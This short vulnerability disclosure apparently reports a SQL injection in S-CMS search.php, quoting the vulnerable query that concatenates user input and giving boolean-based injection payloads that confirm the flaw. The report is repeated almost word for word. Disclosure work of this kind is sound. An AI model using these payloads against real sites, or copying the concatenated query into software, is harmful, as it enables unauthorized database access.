Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip
location: S-CMS/search.php line 155
Vulnerable code: $sql="select * from SL_text where (T_title like '%".$keyword."%' or T_content like '%".$keyword."%' ) order by T_id desc";
Exp:
%' AND 1=1 AND '%'='
%' AND 1=2 AND '%'='
Attacker can add sql statement in the between of both "and" to query the database.
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip
location: S-CMS/search.php line 155
Vulnerable code: $sql="select * from SL_text where (T_title like '%".$keyword."%' or T_content like '%".$keyword."%' ) order by T_id desc";
Exp:
%' AND 1=1 AND '%'='
Attacker can add sql statement in the between of both "and" to query the database.
Comments
Post a Comment